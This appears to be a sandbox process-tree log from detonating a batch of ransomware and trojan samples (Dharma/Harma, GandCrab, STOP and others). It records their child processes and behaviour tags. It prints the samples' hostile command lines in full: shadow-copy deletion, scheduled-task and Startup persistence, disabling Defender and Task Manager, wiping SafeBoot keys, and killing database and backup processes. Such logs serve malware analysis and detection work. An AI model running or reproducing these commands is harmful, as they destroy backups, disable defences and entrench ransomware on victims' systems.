- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
    HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - System Location Discovery: System Language Discovery
    PID:5016
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
    HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
      "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5864
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
    HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3332
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9142005D-2F1F-4DB8-8F0E-237525AC258B}'" delete
      4⤵
      PID:6696
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9142005D-2F1F-4DB8-8F0E-237525AC258B}'" delete
        5⤵
        
        PID:7340
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-edfe3f35441f8be60eaf3c05d8aef4a4fe3ef9e1f87888639004894e2add2621.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-edfe3f35441f8be60eaf3c05d8aef4a4fe3ef9e1f87888639004894e2add2621.exe
    3⤵
    - Executes dropped EXE
    PID:6328
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
    HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
    3⤵
    - Executes dropped EXE
    PID:7064
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
      .
      4⤵
      PID:456
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 268
        5⤵
        Program crash
        
        PID:5068
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
      C:\Users\Admin
      4⤵
      PID:6848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 300
        5⤵
        Program crash
        
        PID:2616
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
      C:\ProgramData
      4⤵
      PID:6840
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
      C:\Program Files (x86)
      4⤵
      PID:6792
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
      C:\Users\Admin\AppData\Roaming
      4⤵
      PID:6916
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 288
        5⤵
        Program crash
        
        PID:6828
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
      \\DADDYSERVER
      4⤵
      PID:6124
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe9c62db424aa7f463f26c4acb5fa457a0378463689d409d902461de2e253093.exe
    HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe9c62db424aa7f463f26c4acb5fa457a0378463689d409d902461de2e253093.exe
    3⤵
    - Executes dropped EXE
    PID:7104
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9af680c45a7f146176d9ea94ef7589544ef33ed88b78d4d0eec62e6b4ad55259.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9af680c45a7f146176d9ea94ef7589544ef33ed88b78d4d0eec62e6b4ad55259.exe
    3⤵
    PID:7116
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-c79a2a45c5ed7e884911533a5be8fe17be60210705fd3925c1007fd12edfee10.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.pef-c79a2a45c5ed7e884911533a5be8fe17be60210705fd3925c1007fd12edfee10.exe
    3⤵
    PID:6048
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 480
      4⤵
      Program crash
      PID:7464
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Generic-12fe1a5cfbef5b40d33d1586096588188e2f88c30eb7e75ccea7b88b87f85462.exe
    HEUR-Trojan-Ransom.Win32.Generic-12fe1a5cfbef5b40d33d1586096588188e2f88c30eb7e75ccea7b88b87f85462.exe
    3⤵
    PID:6256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 236
      4⤵
      Program crash
      PID:7200
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe
    HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe
    3⤵
    PID:4444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
      4⤵
      PID:7668
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7564
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
      4⤵
      PID:12044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
      4⤵
      PID:12232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
      4⤵
      PID:7504
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:8312
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
        5⤵
        Views/modifies file attributes
        
        PID:8392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /RU SYSTEM /RL HIGHEST /F
      4⤵
      PID:9036
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /TN hrm /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /RU SYSTEM /RL HIGHEST /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /F
      4⤵
      PID:10072
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /TN Harma /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10160
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:10224
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +s harma.exe
        5⤵
        Views/modifies file attributes
        
        PID:10268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:10376
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +s C:\ProgramData\harma.exe
        5⤵
        Views/modifies file attributes
        
        PID:10452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      PID:10704
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        5⤵
        
        PID:10900
      - C:\Windows\SysWOW64\icacls.exe
        
        icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        6⤵
        Modifies file permissions
        
        PID:11244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:10756
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
        5⤵
        
        PID:10976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
      4⤵
      PID:10920
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /t /f /im sql*
        5⤵
        
        PID:11176
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /t /f /im sql*
        6⤵
        Kills process with taskkill
        
        PID:7260
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /t /im veeam*
        5⤵
        Kills process with taskkill
        
        PID:11252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
      4⤵
      PID:11220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
      4⤵
      PID:11636
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
      4⤵
      PID:11936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
      4⤵
      PID:7816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
      4⤵
      PID:12040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:9576
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        
        PID:9664
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:9396
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        5⤵
        
        PID:10084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
      4⤵
      PID:10140
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
        5⤵
        
        PID:7620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
      4⤵
      PID:2184
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
        5⤵
        
        PID:10172
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9.exe
    HEUR-Trojan-Ransom.Win32.PolyRansom.gen-7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9.exe
    3⤵
    PID:4436
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
    3⤵
    PID:5888
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
      HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
      4⤵
      PID:7684
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Local\07baf339-4cae-4dfc-a0cc-c3016531c157" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        5⤵
        Modifies file permissions
        
        PID:11872
    - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
        
        "C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:284
      - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
        
        "C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        
        PID:7884
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-aacbdfb0876945145eaed48ba7d407002931233f7fd2ed29d8d82c4acc15d50d.exe
    HEUR-Trojan.MSIL.Crypt.gen-aacbdfb0876945145eaed48ba7d407002931233f7fd2ed29d8d82c4acc15d50d.exe
    3⤵
    PID:5872
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-b101bb78780fc065872cce7a311d65e3361d9c6b9c1191ef2b45535bf4bc71f1.exe
    HEUR-Trojan.MSIL.Crypt.gen-b101bb78780fc065872cce7a311d65e3361d9c6b9c1191ef2b45535bf4bc71f1.exe
    3⤵
    PID:3972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
      4⤵
      PID:7836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
      4⤵
      PID:7844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
      4⤵
      PID:7888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
      4⤵
      PID:8060
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-bda16ef37fa055ac934e131acb824a54850d0a63cb2c56e24e7f9073336cdd43.exe
    HEUR-Trojan.MSIL.Crypt.gen-bda16ef37fa055ac934e131acb824a54850d0a63cb2c56e24e7f9073336cdd43.exe
    3⤵
    PID:6392
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-cdc1cc9abef2cb170ec2e635b1e43541e89ebe5a68fc1e516f5d7a9759025bbb.exe
    HEUR-Trojan.MSIL.Crypt.gen-cdc1cc9abef2cb170ec2e635b1e43541e89ebe5a68fc1e516f5d7a9759025bbb.exe
    3⤵
    PID:6404
  - - C:\Users\Admin\AppData\Local\Temp\system.exe
      "C:\Users\Admin\AppData\Local\Temp\system.exe"
      4⤵
      PID:11756
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\system.exe" "system.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:8236
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-d992f05972629a2764cd1b57abfb88c714647a86af9a017a9211b85e56a0c3e2.exe
    HEUR-Trojan.MSIL.Crypt.gen-d992f05972629a2764cd1b57abfb88c714647a86af9a017a9211b85e56a0c3e2.exe
    3⤵
    PID:6424
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-deb8b966472fc6965603cf2f0b518bf46ae0b57a871afe96f4555541b42ea7d2.exe
    HEUR-Trojan.MSIL.Crypt.gen-deb8b966472fc6965603cf2f0b518bf46ae0b57a871afe96f4555541b42ea7d2.exe
    3⤵
    PID:7860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 984
      4⤵
      Program crash
      PID:6280
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Agent.aumz-01fa1ed69196ed40a66dbf458eaa6bdf983263175101c505eae366b85727e26e.exe
    Trojan-Ransom.Win32.Agent.aumz-01fa1ed69196ed40a66dbf458eaa6bdf983263175101c505eae366b85727e26e.exe
    3⤵
    PID:7416
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Blocker.kpuo-cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954.exe
    Trojan-Ransom.Win32.Blocker.kpuo-cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954.exe
    3⤵
    PID:7240
  - - C:\Windows\xk.exe
      C:\Windows\xk.exe
      4⤵
      PID:11500
  - - C:\Windows\SysWOW64\IExplorer.exe
      C:\Windows\system32\IExplorer.exe
      4⤵
      PID:7184
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
      4⤵
      PID:11696
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
      4⤵
      PID:8524
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
      4⤵
      PID:11976
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
      4⤵
      PID:7668
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
      4⤵
      PID:8320
  - - C:\Windows\xk.exe
      C:\Windows\xk.exe
      4⤵
      PID:11984
  - - C:\Windows\SysWOW64\IExplorer.exe
      C:\Windows\system32\IExplorer.exe
      4⤵
      PID:11640
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
      4⤵
      PID:7196
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
      4⤵
      PID:7344
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
      4⤵
      PID:11956
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
      4⤵
      PID:7444
  - - C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
      "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
      4⤵
      PID:7340
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Cryptodef.adbh-14259c6645fadc816ba82c52c050f1b58b5507ba292985ee29931341700ac55c.exe
    Trojan-Ransom.Win32.Cryptodef.adbh-14259c6645fadc816ba82c52c050f1b58b5507ba292985ee29931341700ac55c.exe
    3⤵
    PID:8348
  - - C:\831897~1.EXE
      "C:\831897~1.EXE"
      4⤵
      PID:9056
    - - C:\Windows\SysWOW64\svchost.exe
        
        "C:\Windows\syswow64\svchost.exe"
        5⤵
        
        PID:11900
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Cryptodef.aoo-1dece757fb0cdc99d5caa035d41970e2a32ac4c0b03c94f3c029b2fd85d90b7f.exe
    Trojan-Ransom.Win32.Cryptodef.aoo-1dece757fb0cdc99d5caa035d41970e2a32ac4c0b03c94f3c029b2fd85d90b7f.exe
    3⤵
    PID:8364
  - - C:\Users\Admin\AppData\Local\Temp\wujek.exe
      "C:\Users\Admin\AppData\Local\Temp\wujek.exe"
      4⤵
      PID:9044
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Digitala.do-7424ec4f70d0c951ad4d4621926aa964fec54031f79aa2c83139dae17c2f3239.exe
    Trojan-Ransom.Win32.Digitala.do-7424ec4f70d0c951ad4d4621926aa964fec54031f79aa2c83139dae17c2f3239.exe
    3⤵
    PID:8380
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
    Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
    3⤵
    PID:8400
  - - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
      Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
      4⤵
      PID:8800
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
    Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
    3⤵
    PID:8436
  - - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
      C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
      4⤵
      PID:10848
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
        5⤵
        
        PID:11036
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe"
        6⤵
        
        PID:11556
        
        C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
        
        C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
        7⤵
        
        PID:11712
        
        C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
        
        C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
        8⤵
        
        PID:11032
- - C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.GandCrypt.jfg-c8c08da8d15d8d673674a59eeabd6b212647b57a846b72b6c76b321f34401f69.exe
    Trojan-Ransom.Win32.GandCrypt.jfg-c8c08da8d15d8d673674a59eeabd6b212647b57a846b72b6c76b321f34401f69.exe
    3⤵
    PID:9396
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9396 -s 392
      4⤵
      Program crash
      PID:9920

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2456
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3456

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6256 -ip 6256
1⤵
PID:6968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6048 -ip 6048
1⤵
PID:5812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7860 -ip 7860
1⤵
PID:7608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 456 -ip 456
1⤵
PID:8052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6916 -ip 6916
1⤵
PID:8068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6840 -ip 6840
1⤵
PID:7048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6848 -ip 6848
1⤵
PID:6896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6792 -ip 6792
1⤵
PID:6348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7116 -ip 7116
1⤵
PID:6924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 9396 -ip 9396
1⤵
PID:9900

